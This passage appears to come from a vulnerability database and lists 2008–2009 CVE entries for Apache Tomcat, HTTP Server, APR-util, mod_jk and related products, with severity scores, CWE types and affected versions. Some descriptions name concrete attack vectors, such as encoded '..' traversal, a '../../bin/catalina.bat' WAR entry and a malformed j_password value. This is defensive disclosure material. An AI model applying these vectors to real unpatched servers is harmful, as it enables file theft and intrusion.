apache tomcat 6.0.3
apache tomcat 4.1.3
apache tomcat 6.0.14
CVE-2008-2938 MEDIUM

Directory traversal vulnerability in Apache Tomcat 4.1.0 through 4.1.37, 5.5.0 through 5.5.26, and 6.0.0 through 6.0.16, when allowLinking and UTF-8 are enabled, allows remote attackers to read arbitrary files via encoded directory traversal sequences in the URI, a different vulnerability than CVE-2008-2370. NOTE: versions earlier than 6.0.18 were reported affected, but the vendor advisory lists 6.0.16 as the last affected version.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-22,

Products Affected

Vendor Product Version
apache tomcat *
CVE-2008-2939 MEDIUM

Cross-site scripting (XSS) vulnerability in proxy_ftp.c in the mod_proxy_ftp module in Apache 2.0.63 and earlier, and mod_proxy_ftp.c in the mod_proxy_ftp module in Apache 2.2.9 and earlier 2.2 versions, allows remote attackers to inject arbitrary web script or HTML via a wildcard in the last directory component in the pathname in an FTP URI.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-79,

Products Affected

Vendor Product Version
canonical ubuntu_linux 7.10
apache http_server 2.2.6
apache http_server *
apache http_server -
apple mac_os_x *
apache http_server 2.2.4
apache http_server 2.2.8
opensuse opensuse 10.2
apache http_server 2.2.2
canonical ubuntu_linux 8.04
canonical ubuntu_linux 6.06
apache http_server 2.2.9
apache http_server 2.2.1
apache http_server 2.2.0
apache http_server 2.2.3
opensuse opensuse 10.3
opensuse opensuse 11.0
CVE-2008-3271 MEDIUM

Apache Tomcat 5.5.0 and 4.1.0 through 4.1.31 allows remote attackers to bypass an IP address restriction and obtain sensitive information via a request that is processed concurrently with another request but in a different thread, leading to an instance-variable overwrite associated with a "synchronization problem" and lack of thread safety, and related to RemoteFilterValve, RemoteAddrValve, and RemoteHostValve.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-264,

Products Affected

Vendor Product Version
apache tomcat 4.1.2
apache tomcat 4.1.16
apache tomcat 4.1.18
apache tomcat 4.1.5
apache tomcat 4.1.28
apache tomcat 4.1.29
apache tomcat 4.1.1
apache tomcat 4.1.10
apache tomcat 4.1.31
apache tomcat 4.1.15
apache tomcat 4.1.8
apache tomcat 4.1.21
apache tomcat 4.1.12
apache tomcat 4.1.17
apache tomcat 4.1.25
apache tomcat 4.1.4
apache tomcat 5.5.0
apache tomcat 4.1.13
apache tomcat 4.1.22
apache tomcat 4.1.7
apache tomcat 4.1.24
apache tomcat 4.1.19
apache tomcat 4.1.11
apache tomcat 4.1.27
apache tomcat 4.1.9
apache tomcat 4.1.0
apache tomcat 4.1.20
apache tomcat 4.1.30
apache tomcat 4.1.26
apache tomcat 4.1.23
apache tomcat 4.1.6
apache tomcat 4.1.14
apache tomcat 4.1.3
CVE-2008-3282 HIGH

Integer overflow in the rtl_allocateMemory function in sal/rtl/source/alloc_global.c in the memory allocator in OpenOffice.org (OOo) 2.4.1, on 64-bit platforms, allows remote attackers to cause a denial of service (application crash) or possibly execute arbitrary code via a crafted document, related to a "numeric truncation error," a different vulnerability than CVE-2008-2152.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 7.8 HIGH CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H 1.8 5.9

CVSS 2.0

Severity: HIGH

Problem Type: CWE-681,CWE-681,

Products Affected

Vendor Product Version
apache openoffice 2.4.1
fedoraproject fedora 8
fedoraproject fedora 9
CVE-2008-4308 LOW

The doRead method in Apache Tomcat 4.1.32 through 4.1.34 and 5.5.10 through 5.5.20 does not return a -1 to indicate when a certain error condition has occurred, which can cause Tomcat to send POST content from one request to a different request.

CVSS 2.0

Severity: LOW

Problem Type: CWE-200,

Products Affected

Vendor Product Version
apache tomcat 5.5.10
apache tomcat 4.1.33
apache tomcat 5.5.16
apache tomcat 5.5.12
apache tomcat 5.5.14
apache tomcat 4.1.34
apache tomcat 5.5.15
apache tomcat 5.5.20
apache tomcat 5.5.11
apache tomcat 5.5.18
apache tomcat 5.5.19
apache tomcat 5.5.13
apache tomcat 5.5.17
apache tomcat 4.1.32
CVE-2008-5515 MEDIUM

Apache Tomcat 4.1.0 through 4.1.39, 5.5.0 through 5.5.27, 6.0.0 through 6.0.18, and possibly earlier versions normalizes the target pathname before filtering the query string when using the RequestDispatcher method, which allows remote attackers to bypass intended access restrictions and conduct directory traversal attacks via .. (dot dot) sequences and the WEB-INF directory in a Request.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-22,

Products Affected

Vendor Product Version
apache tomcat 4.1.2
apache tomcat 4.1.33
apache tomcat 4.1.18
apache tomcat 5.5.14
apache tomcat 4.1.29
apache tomcat 6.0
apache tomcat 4.1.1
apache tomcat 4.1.34
apache tomcat 5.5.27
apache tomcat 4.1.15
apache tomcat 5.5.15
apache tomcat 5.5.11
apache tomcat 4.1.12
apache tomcat 5.5.6
apache tomcat 6.0.7
apache tomcat 5.5.18
apache tomcat 4.1.17
apache tomcat 6.0.1
apache tomcat 5.5.5
apache tomcat 5.5.7
apache tomcat 5.5.0
apache tomcat 4.1.13
apache tomcat 4.1.22
apache tomcat 4.1.24
apache tomcat 6.0.12
apache tomcat 5.5.26
apache tomcat 4.1.19
apache tomcat 5.5.16
apache tomcat 4.1.11
apache tomcat 4.1.37
apache tomcat 4.1.39
apache tomcat 5.5.9
apache tomcat 4.1.38
apache tomcat 6.0.15
apache tomcat 5.5.23
apache tomcat 5.5.1
apache tomcat 6.0.4
apache tomcat 5.5.21
apache tomcat 6.0.2
apache tomcat 5.5.13
apache tomcat 5.5.17
apache tomcat 4.1.20
apache tomcat 4.1.30
apache tomcat 5.5.8
apache tomcat 4.1.26
apache tomcat 4.1.32
apache tomcat 5.5.3
apache tomcat 6.0.5
apache tomcat 4.1.14
apache tomcat 4.1.36
apache tomcat 5.5.24
apache tomcat 5.5.22
apache tomcat 6.0.17
apache tomcat 4.1.16
apache tomcat 5.5.12
apache tomcat 4.1.28
apache tomcat 4.1.10
apache tomcat 4.1.31
apache tomcat 4.1.21
apache tomcat 6.0.13
apache tomcat 4.1.25
apache tomcat 4.1.35
apache tomcat 6.0.6
apache tomcat 6.0.18
apache tomcat 5.5.10
apache tomcat 5.5.25
apache tomcat 6.0.10
apache tomcat 5.5.4
apache tomcat 4.1.27
apache tomcat 5.5.20
apache tomcat 5.5.2
apache tomcat 6.0.0
apache tomcat 6.0.16
apache tomcat 4.1.0
apache tomcat 5.5.19
apache tomcat 4.1.23
apache tomcat 6.0.9
apache tomcat 6.0.3
apache tomcat 4.1.3
apache tomcat 6.0.14
CVE-2008-5519 LOW

The JK Connector (aka mod_jk) 1.2.0 through 1.2.26 in Apache Tomcat allows remote attackers to obtain sensitive information via an arbitrary request from an HTTP client, in opportunistic circumstances involving (1) a request from a different client that included a Content-Length header but no POST data or (2) a rapid series of requests, related to noncompliance with the AJP protocol's requirements for requests containing Content-Length headers.

CVSS 2.0

Severity: LOW

Problem Type: CWE-200,

Products Affected

Vendor Product Version
apache tomcat 4.1.33
apache tomcat 4.1.29
apache tomcat 4.1.34
apache tomcat 5.5.27
apache tomcat 5.5.15
apache tomcat 5.0.22
apache mod_jk 1.2.14.1
apache tomcat 5.0.5
apache tomcat 5.0.14
apache tomcat 5.5.18
apache tomcat 4.1.4
apache tomcat 4.1.13
apache tomcat 4.0.3
apache tomcat 5.5.26
apache mod_jk 1.2.23
apache tomcat 5.5.16
apache tomcat 5.0.27
apache tomcat 4.0.5
apache tomcat 5.0.23
apache tomcat 5.5.23
apache tomcat 5.5.21
apache tomcat 5.0.19
apache tomcat 5.5.13
apache tomcat 4.1.30
apache mod_jk 1.2.13
apache tomcat 5.5.8
apache tomcat 4.1.26
apache tomcat 4.1.32
apache mod_jk 1.2.9
apache tomcat 5.0.0
apache tomcat 4.1.14
apache tomcat 5.5.22
apache tomcat 5.0.26
apache tomcat 5.0.12
apache tomcat 5.0.30
apache mod_jk 1.2.25
apache tomcat 4.1.8
apache tomcat 5.0.9
apache mod_jk 1.2.19
apache tomcat 5.0.29
apache mod_jk 1.2.10
apache mod_jk 1.2.21
apache tomcat 4.1.25
apache tomcat 4.1.35
apache tomcat 5.0.15
apache tomcat 4.0.2
apache tomcat 5.5.10
apache tomcat 5.5.25
apache mod_jk 1.2.18
apache tomcat 5.5.4
apache mod_jk 1.2.26
apache mod_jk 1.2.1
apache tomcat 5.5.2
apache tomcat 4.1.0
apache tomcat 5.0.11
apache tomcat 4.1.23
apache tomcat 4.1.6
apache tomcat 5.0.4
apache tomcat 4.1.3
apache tomcat 4.1.2
apache mod_jk 1.2.12
apache tomcat 5.0.17
apache tomcat 4.0.0
apache tomcat 4.1.18
apache tomcat 5.0.2
apache tomcat 4.1.5
apache tomcat 5.5.14
apache tomcat 4.1.1
apache tomcat 4.1.15
apache tomcat 4.0.4
apache tomcat 5.5.11
apache tomcat 4.1.12
apache tomcat 5.5.6
apache tomcat 4.1.17
apache tomcat 5.0.24
apache tomcat 5.0.16
apache tomcat 5.5.5
apache tomcat 5.5.7
apache tomcat 5.5.0
apache mod_jk 1.2
apache tomcat 4.1.22
apache tomcat 5.0.13
apache tomcat 4.1.7
apache tomcat 4.1.24
apache tomcat 5.0.28
apache tomcat 4.1.19
apache tomcat 4.1.11
apache tomcat 5.5.9
apache tomcat 4.0.1
apache tomcat 5.5.1
apache mod_jk 1.2.24
apache mod_jk 1.2.8
apache mod_jk 1.2.17
apache mod_jk 1.2.6
apache tomcat 5.5.17
apache tomcat 4.1.20
apache tomcat 5.5.3
apache mod_jk 1.2.7
apache tomcat 4.1.36
apache tomcat 5.0.7
apache tomcat 5.5.24
apache tomcat 4.1.16
apache tomcat 5.5.12
apache tomcat 4.1.28
apache tomcat 4.1.10
apache tomcat 4.1.31
apache tomcat 5.0.3
apache tomcat 5.0.8
apache tomcat 5.0.21
apache tomcat 4.1.21
apache tomcat 5.0.25
apache tomcat 5.0.10
apache tomcat 4.0.6
apache mod_jk 1.2.16
apache tomcat 5.0.6
apache mod_jk 1.2.11
apache mod_jk 1.2.20
apache mod_jk 1.2.15
apache mod_jk 1.2.14
apache tomcat 4.1.27
apache tomcat 5.5.20
apache tomcat 4.1.9
apache tomcat 5.5.19
apache tomcat 5.0.18
apache mod_jk 1.2.22
apache tomcat 5.0.1
CVE-2009-0023 MEDIUM

The apr_strmatch_precompile function in strmatch/apr_strmatch.c in Apache APR-util before 1.3.5 allows remote attackers to cause a denial of service (daemon crash) via crafted input involving (1) a .htaccess file used with the Apache HTTP Server, (2) the SVNMasterURI directive in the mod_dav_svn module in the Apache HTTP Server, (3) the mod_apreq2 module for the Apache HTTP Server, or (4) an application that uses the libapreq2 library, which triggers a heap-based buffer underflow.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-119,

Products Affected

Vendor Product Version
apache apr-util *
apache apr-util 1.1.0
apache apr-util 0.9.2
apache apr-util 0.9.3
apache apr-util 1.1.1
apache apr-util 1.2.8
apache apr-util 1.0.1
apache apr-util 1.1.2
apache apr-util 1.2.1
apache apr-util 1.2.2
apache apr-util 1.3.3
apache apr-util 0.9.1
apache apr-util 1.2.7
apache apr-util 1.0
apache apr-util 1.3.2
apache apr-util 1.2.6
apache apr-util 0.9.5
apache apr-util 1.3.0
apache apr-util 1.0.2
apache apr-util 1.3.1
apache apr-util 0.9.4
CVE-2009-0026 MEDIUM

Multiple cross-site scripting (XSS) vulnerabilities in Apache Jackrabbit before 1.5.2 allow remote attackers to inject arbitrary web script or HTML via the q parameter to (1) search.jsp or (2) swr.jsp.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-79,

Products Affected

Vendor Product Version
apache jackrabbit 1.4
apache jackrabbit 1.5.0
CVE-2009-0033 MEDIUM

Apache Tomcat 4.1.0 through 4.1.39, 5.5.0 through 5.5.27, and 6.0.0 through 6.0.18, when the Java AJP connector and mod_jk load balancing are used, allows remote attackers to cause a denial of service (application outage) via a crafted request with invalid headers, related to temporary blocking of connectors that have encountered errors, as demonstrated by an error involving a malformed HTTP Host header.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-20,

Products Affected

Vendor Product Version
apache tomcat 4.1.2
apache tomcat 4.1.33
apache tomcat 4.1.18
apache tomcat 4.1.5
apache tomcat 5.5.14
apache tomcat 4.1.29
apache tomcat 4.1.1
apache tomcat 4.1.34
apache tomcat 5.5.27
apache tomcat 4.1.15
apache tomcat 5.5.15
apache tomcat 5.5.11
apache tomcat 4.1.12
apache tomcat 5.5.6
apache tomcat 6.0.7
apache tomcat 5.5.18
apache tomcat 4.1.17
apache tomcat 6.0.1
apache tomcat 5.5.5
apache tomcat 5.5.7
apache tomcat 4.1.4
apache tomcat 5.5.0
apache tomcat 6.0.8
apache tomcat 4.1.13
apache tomcat 4.1.22
apache tomcat 4.1.7
apache tomcat 4.1.24
apache tomcat 6.0.12
apache tomcat 5.5.26
apache tomcat 4.1.19
apache tomcat 5.5.16
apache tomcat 4.1.11
apache tomcat 4.1.37
apache tomcat 4.1.39
apache tomcat 5.5.9
apache tomcat 4.1.38
apache tomcat 6.0.15
apache tomcat 5.5.23
apache tomcat 5.5.1
apache tomcat 6.0.4
apache tomcat 5.5.21
apache tomcat 6.0.2
apache tomcat 5.5.13
apache tomcat 5.5.17
apache tomcat 4.1.20
apache tomcat 4.1.30
apache tomcat 5.5.8
apache tomcat 4.1.26
apache tomcat 4.1.32
apache tomcat 5.5.3
apache tomcat 6.0.5
apache tomcat 4.1.14
apache tomcat 4.1.36
apache tomcat 5.5.24
apache tomcat 5.5.22
apache tomcat 4.1.16
apache tomcat 5.5.12
apache tomcat 4.1.28
apache tomcat 4.1.10
apache tomcat 4.1.31
apache tomcat 4.1.8
apache tomcat 4.1.21
apache tomcat 6.0.13
apache tomcat 4.1.25
apache tomcat 4.1.35
apache tomcat 6.0.6
apache tomcat 5.5.10
apache tomcat 5.5.25
apache tomcat 6.0.10
apache tomcat 5.5.4
apache tomcat 4.1.27
apache tomcat 5.5.20
apache tomcat 4.1.9
apache tomcat 5.5.2
apache tomcat 6.0.0
apache tomcat 6.0.16
apache tomcat 4.1.0
apache tomcat 5.5.19
apache tomcat 6.0.11
apache tomcat 4.1.23
apache tomcat 6.0.9
apache tomcat 4.1.6
apache tomcat 6.0.3
apache tomcat 4.1.3
apache tomcat 6.0.14
CVE-2009-0580 MEDIUM

Apache Tomcat 4.1.0 through 4.1.39, 5.5.0 through 5.5.27, and 6.0.0 through 6.0.18, when FORM authentication is used, allows remote attackers to enumerate valid usernames via requests to /j_security_check with malformed URL encoding of passwords, related to improper error checking in the (1) MemoryRealm, (2) DataSourceRealm, and (3) JDBCRealm authentication realms, as demonstrated by a % (percent) value for the j_password parameter.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-200,

Products Affected

Vendor Product Version
apache tomcat 4.1.2
apache tomcat 4.1.33
apache tomcat 4.1.18
apache tomcat 4.1.5
apache tomcat 5.5.14
apache tomcat 4.1.29
apache tomcat 4.1.1
apache tomcat 4.1.34
apache tomcat 5.5.27
apache tomcat 4.1.15
apache tomcat 5.5.15
apache tomcat 5.5.11
apache tomcat 4.1.12
apache tomcat 5.5.6
apache tomcat 6.0.7
apache tomcat 5.5.18
apache tomcat 4.1.17
apache tomcat 6.0.1
apache tomcat 5.5.5
apache tomcat 5.5.7
apache tomcat 4.1.4
apache tomcat 5.5.0
apache tomcat 6.0.8
apache tomcat 4.1.13
apache tomcat 4.1.22
apache tomcat 4.1.7
apache tomcat 4.1.24
apache tomcat 6.0.12
apache tomcat 5.5.26
apache tomcat 4.1.19
apache tomcat 5.5.16
apache tomcat 4.1.11
apache tomcat 4.1.37
apache tomcat 4.1.39
apache tomcat 5.5.9
apache tomcat 4.1.38
apache tomcat 6.0.15
apache tomcat 5.5.23
apache tomcat 5.5.1
apache tomcat 6.0.4
apache tomcat 5.5.21
apache tomcat 6.0.2
apache tomcat 5.5.13
apache tomcat 5.5.17
apache tomcat 4.1.20
apache tomcat 4.1.30
apache tomcat 5.5.8
apache tomcat 4.1.26
apache tomcat 4.1.32
apache tomcat 5.5.3
apache tomcat 6.0.5
apache tomcat 4.1.14
apache tomcat 4.1.36
apache tomcat 5.5.24
apache tomcat 5.5.22
apache tomcat 4.1.16
apache tomcat 5.5.12
apache tomcat 4.1.28
apache tomcat 4.1.10
apache tomcat 4.1.31
apache tomcat 4.1.8
apache tomcat 4.1.21
apache tomcat 6.0.13
apache tomcat 4.1.25
apache tomcat 4.1.35
apache tomcat 6.0.6
apache tomcat 5.5.10
apache tomcat 5.5.25
apache tomcat 6.0.10
apache tomcat 5.5.4
apache tomcat 4.1.27
apache tomcat 5.5.20
apache tomcat 4.1.9
apache tomcat 5.5.2
apache tomcat 6.0.0
apache tomcat 6.0.16
apache tomcat 4.1.0
apache tomcat 5.5.19
apache tomcat 6.0.11
apache tomcat 4.1.23
apache tomcat 6.0.9
apache tomcat 4.1.6
apache tomcat 6.0.3
apache tomcat 4.1.3
apache tomcat 6.0.14
CVE-2009-0781 MEDIUM

Cross-site scripting (XSS) vulnerability in jsp/cal/cal2.jsp in the calendar application in the examples web application in Apache Tomcat 4.1.0 through 4.1.39, 5.5.0 through 5.5.27, and 6.0.0 through 6.0.18 allows remote attackers to inject arbitrary web script or HTML via the time parameter, related to "invalid HTML."

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-79,

Products Affected

Vendor Product Version
apache tomcat 4.1.2
apache tomcat 4.1.33
apache tomcat 4.1.18
apache tomcat 4.1.5
apache tomcat 5.5.14
apache tomcat 4.1.29
apache tomcat 6.0
apache tomcat 4.1.1
apache tomcat 4.1.34
apache tomcat 4.1.15
apache tomcat 5.5.15
apache tomcat 5.5.11
apache tomcat 4.1.12
apache tomcat 5.5.6
apache tomcat 6.0.7
apache tomcat 5.5.18
apache tomcat 4.1.17
apache tomcat 6.0.1
apache tomcat 5.5.5
apache tomcat 5.5.7
apache tomcat 4.1.4
apache tomcat 5.5.0
apache tomcat 6.0.8
apache tomcat 4.1.13
apache tomcat 4.1.22
apache tomcat 4.1.7
apache tomcat 4.1.24
apache tomcat 6.0.12
apache tomcat 5.5.26
apache tomcat 4.1.19
apache tomcat 5.5.16
apache tomcat 4.1.11
apache tomcat 4.1.37
apache tomcat 5.5.9
apache tomcat 6.0.15
apache tomcat 5.5.23
apache tomcat 5.5.1
apache tomcat 6.0.4
apache tomcat 5.5.21
apache tomcat 6.0.2
apache tomcat 5.5.13
apache tomcat 5.5.17
apache tomcat 4.1.20
apache tomcat 4.1.30
apache tomcat 5.5.8
apache tomcat 4.1.26
apache tomcat 4.1.32
apache tomcat 5.5.3
apache tomcat 6.0.5
apache tomcat 4.1.14
apache tomcat 4.1.36
apache tomcat 5.5.24
apache tomcat 5.5.22
apache tomcat 4.1.16
apache tomcat 5.5.12
apache tomcat 4.1.28
apache tomcat 4.1.10
apache tomcat 4.1.31
apache tomcat 4.1.8
apache tomcat 4.1.21
apache tomcat 6.0.13
apache tomcat 4.1.25
apache tomcat 4.1.35
apache tomcat 6.0.6
apache tomcat 5.5.10
apache tomcat 5.5.25
apache tomcat 6.0.10
apache tomcat 5.5.4
apache tomcat 4.1.27
apache tomcat 5.5.20
apache tomcat 4.1.9
apache tomcat 5.5.2
apache tomcat 6.0.0
apache tomcat 6.0.16
apache tomcat 4.1.0
apache tomcat 5.5.19
apache tomcat 6.0.11
apache tomcat 4.1.23
apache tomcat 6.0.9
apache tomcat 4.1.6
apache tomcat 6.0.3
apache tomcat 4.1.3
apache tomcat 6.0.14
CVE-2009-0783 MEDIUM

Apache Tomcat 4.1.0 through 4.1.39, 5.5.0 through 5.5.27, and 6.0.0 through 6.0.18 permits web applications to replace an XML parser used for other web applications, which allows local users to read or modify the (1) web.xml, (2) context.xml, or (3) tld files of arbitrary web applications via a crafted application that is loaded earlier than the target application.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-200,

Products Affected

Vendor Product Version
apache tomcat *
CVE-2009-0796 LOW

Cross-site scripting (XSS) vulnerability in Status.pm in Apache::Status and Apache2::Status in mod_perl1 and mod_perl2 for the Apache HTTP Server, when /perl-status is accessible, allows remote attackers to inject arbitrary web script or HTML via the URI.

CVSS 2.0

Severity: LOW

Problem Type: CWE-79,

Products Affected

Vendor Product Version
apache mod_perl 2
apache mod_perl 1
CVE-2009-1191 MEDIUM

mod_proxy_ajp.c in the mod_proxy_ajp module in the Apache HTTP Server 2.2.11 allows remote attackers to obtain sensitive response data, intended for a client that sent an earlier POST request with no request body, via an HTTP request.

CVSS 2.0

Severity: MEDIUM

Problem Type: NVD-CWE-noinfo,

Products Affected

Vendor Product Version
canonical ubuntu_linux 8.10
canonical ubuntu_linux 8.04
canonical ubuntu_linux 6.06
canonical ubuntu_linux 9.04
apache http_server 2.2.11
CVE-2009-1195 MEDIUM

The Apache HTTP Server 2.2.11 and earlier 2.2 versions does not properly handle Options=IncludesNOEXEC in the AllowOverride directive, which allows local users to gain privileges by configuring (1) Options Includes, (2) Options +Includes, or (3) Options +IncludesNOEXEC in a .htaccess file, and then inserting an exec element in a .shtml file.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-16,

Products Affected

Vendor Product Version
apache http_server 2.2.6
apache http_server 2.2.10
apache http_server *
apache http_server -
apache http_server 2.2.7
apache http_server 2.2.4
apache http_server 2.2.8
apache http_server 2.2
apache http_server 2.2.2
apache http_server 2.2.9
apache http_server 2.2.1
apache http_server 2.2.0
apache http_server 2.2.3
CVE-2009-1197 MEDIUM

Apache jUDDI before 2.0 allows attackers to spoof entries in log files via vectors related to error logging of keys from uddiget.jsp.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-20,

Products Affected

Vendor Product Version
apache juddi 0.9
apache juddi 2.0
CVE-2009-1198 MEDIUM

Cross-site scripting (XSS) vulnerability in Apache jUDDI before 2.0 allows remote attackers to inject arbitrary web script or HTML via the dsname parameter to happyjuddi.jsp.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-79,

Products Affected

Vendor Product Version
apache juddi *
CVE-2009-1890 HIGH

The stream_reqbody_cl function in mod_proxy_http.c in the mod_proxy module in the Apache HTTP Server before 2.3.3, when a reverse proxy is configured, does not properly handle an amount of streamed data that exceeds the Content-Length value, which allows remote attackers to cause a denial of service (CPU consumption) via crafted requests.

CVSS 2.0

Severity: HIGH

Problem Type: CWE-400,

Products Affected

Vendor Product Version
apache http_server *
canonical ubuntu_linux 8.10
redhat enterprise_linux_desktop 5.0
debian debian_linux 6.0
canonical ubuntu_linux 9.04
canonical ubuntu_linux 8.04
debian debian_linux 5.0
canonical ubuntu_linux 6.06
redhat enterprise_linux_workstation 5.0
debian debian_linux 4.0
redhat enterprise_linux_eus 5.3
redhat enterprise_linux_server 5.0
redhat enterprise_linux_server_aus 5.3
fedoraproject fedora 11
CVE-2009-1891 HIGH

The mod_deflate module in Apache httpd 2.2.11 and earlier compresses large files until completion even after the associated network connection is closed, which allows remote attackers to cause a denial of service (CPU consumption).

CVSS 2.0

Severity: HIGH

Problem Type: CWE-400,

Products Affected

Vendor Product Version
apache http_server *
canonical ubuntu_linux 8.10
redhat enterprise_linux_desktop 5.0
debian debian_linux 6.0
canonical ubuntu_linux 9.04
canonical ubuntu_linux 8.04
debian debian_linux 5.0
canonical ubuntu_linux 6.06
redhat enterprise_linux_workstation 5.0
debian debian_linux 4.0
redhat enterprise_linux_eus 5.3
redhat enterprise_linux_server 5.0
redhat enterprise_linux_server_aus 5.3
fedoraproject fedora 11
CVE-2009-1955 MEDIUM

The expat XML parser in the apr_xml_* interface in xml/apr_xml.c in Apache APR-util before 1.3.7, as used in the mod_dav and mod_dav_svn modules in the Apache HTTP Server, allows remote attackers to cause a denial of service (memory consumption) via a crafted XML document containing a large number of nested entity references, as demonstrated by a PROPFIND request, a similar issue to CVE-2003-1564.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 7.5 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H 3.9 3.6

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-776,

Products Affected

Vendor Product Version
apache apr-util *
apache http_server *
canonical ubuntu_linux 8.10
apple mac_os_x *
oracle http_server -
suse linux_enterprise_server 9
canonical ubuntu_linux 9.04
fedoraproject fedora 10
fedoraproject fedora 9
canonical ubuntu_linux 8.04
canonical ubuntu_linux 6.06
debian debian_linux 4.0
fedoraproject fedora 11
CVE-2009-1956 MEDIUM

Off-by-one error in the apr_brigade_vprintf function in Apache APR-util before 1.3.5 on big-endian platforms allows remote attackers to obtain sensitive information or cause a denial of service (application crash) via crafted input.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-189,

Products Affected

Vendor Product Version
apache apr-util *
apache http_server *
canonical ubuntu_linux 8.10
canonical ubuntu_linux 8.04
canonical ubuntu_linux 6.06
canonical ubuntu_linux 9.04
CVE-2009-2412 HIGH

Multiple integer overflows in the Apache Portable Runtime (APR) library and the Apache Portable Utility library (aka APR-util) 0.9.x and 1.3.x allow remote attackers to cause a denial of service (application crash) or possibly execute arbitrary code via vectors that trigger crafted calls to the (1) allocator_alloc or (2) apr_palloc function in memory/unix/apr_pools.c in APR; or crafted calls to the (3) apr_rmm_malloc, (4) apr_rmm_calloc, or (5) apr_rmm_realloc function in misc/apr_rmm.c in APR-util; leading to buffer overflows. NOTE: some of these details are obtained from third party information.

CVSS 2.0

Severity: HIGH

Problem Type: CWE-189,

Products Affected

Vendor Product Version
apache apr-util 0.9.9
apache portable_runtime 1.3.6
apache apr-util 1.3.4-dev
apache apr-util 0.9.3
apache apr-util 0.9.3-dev
apache portable_runtime 0.9.2-dev
apache apr-util 1.3.5
apache portable_runtime 0.9.2
apache portable_runtime 0.9.1
apache portable_runtime 1.3.7
apache apr-util 0.9.7-dev
apache portable_runtime 0.9.5
apache portable_runtime 0.9.7
apache portable_runtime 0.9.9
apache portable_runtime 1.3.5
apache apr-util 1.3.4
apache apr-util 1.3.7
apache apr-util 1.3.2
apache portable_runtime 0.9.3
apache apr-util 0.9.16
apache apr-util 1.3.0
apache apr-util 0.9.8
apache apr-util 1.3.1
apache portable_runtime 1.3.3
apache apr-util 1.3.6-dev
apache apr-util 0.9.6
apache apr-util 1.3.6
apache portable_runtime 1.3.4-dev
apache apr-util 0.9.2
apache portable_runtime 0.9.7-dev
apache portable_runtime 0.9.3-dev
apache portable_runtime 1.3.1
apache apr-util 0.9.2-dev
apache apr-util 1.3.8
apache apr-util 1.3.3
apache portable_runtime 1.3.0
apache apr-util 0.9.1
apache portable_runtime 0.9.4
apache portable_runtime 1.3.2
apache portable_runtime 0.9.6
apache apr-util 0.9.5
apache portable_runtime 1.3.6-dev
apache portable_runtime 1.3.8
apache portable_runtime 0.9.8
apache apr-util 0.9.4
apache portable_runtime 1.3.4
apache portable_runtime 0.9.16-dev
CVE-2009-2625 MEDIUM

XMLScanner.java in Apache Xerces2 Java, as used in Sun Java Runtime Environment (JRE) in JDK and JRE 6 before Update 15 and JDK and JRE 5.0 before Update 20, and in other products, allows remote attackers to cause a denial of service (infinite loop and application hang) via malformed XML input, as demonstrated by the Codenomicon XML fuzzing framework.

CVSS 2.0

Severity: MEDIUM

Problem Type: NVD-CWE-Other,

Products Affected

Vendor Product Version
canonical ubuntu_linux 8.10
suse linux_enterprise_server 11
apache xerces2_java 2.9.1
suse linux_enterprise_server 9
oracle jdk 1.5.0
canonical ubuntu_linux 9.04
oracle primavera_p6_enterprise_project_portfolio_management 6.2.1
oracle primavera_web_services 6.2.1
fedoraproject fedora 10
opensuse opensuse 11.2
oracle primavera_p6_enterprise_project_portfolio_management 7.0
opensuse opensuse 11.1
suse linux_enterprise_server 10
canonical ubuntu_linux 8.04
debian debian_linux 5.0
canonical ubuntu_linux 6.06
debian debian_linux 4.0
oracle primavera_p6_enterprise_project_portfolio_management 6.1
opensuse opensuse 11.0
oracle jdk 1.6.0
fedoraproject fedora 11
canonical ubuntu_linux 9.10
oracle primavera_web_services 7.0
CVE-2009-2693 MEDIUM

Directory traversal vulnerability in Apache Tomcat 5.5.0 through 5.5.28 and 6.0.0 through 6.0.20 allows remote attackers to create or overwrite arbitrary files via a .. (dot dot) in an entry in a WAR file, as demonstrated by a ../../bin/catalina.bat entry.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-22,

Products Affected

Vendor Product Version
apache tomcat 5.5.14
apache tomcat 6.0
apache tomcat 5.5.27
apache tomcat 5.5.15
apache tomcat 5.5.11
apache tomcat 5.5.6
apache tomcat 6.0.7
apache tomcat 5.5.18
apache tomcat 6.0.1
apache tomcat 5.5.5
apache tomcat 5.5.7
apache tomcat 5.5.0
apache tomcat 6.0.8
apache tomcat 6.0.12
apache tomcat 5.5.26
apache tomcat 5.5.16
apache tomcat 5.5.9
apache tomcat 6.0.15
apache tomcat 5.5.23
apache tomcat 5.5.1
apache tomcat 6.0.4
apache tomcat 5.5.21
apache tomcat 6.0.2
apache tomcat 5.5.13
apache tomcat 5.5.17
apache tomcat 5.5.8
apache tomcat 5.5.3
apache tomcat 6.0.5
apache tomcat 5.5.24
apache tomcat 5.5.22
apache tomcat 6.0.17
apache tomcat 5.5.28
apache tomcat 5.5.12
apache tomcat 6.0.13
apache tomcat 6.0.6
apache tomcat 6.0.18
apache tomcat 6.0.20
apache tomcat 5.5.10
apache tomcat 5.5.25
apache tomcat 6.0.10
apache tomcat 5.5.4
apache tomcat 5.5.20
apache tomcat 5.5.2
apache tomcat 6.0.0
apache tomcat 6.0.16
apache tomcat 5.5.19
apache tomcat 6.0.11
apache tomcat 6.0.19
apache tomcat 6.0.9
apache tomcat 6.0.3
apache tomcat 6.0.14
CVE-2009-2696 MEDIUM

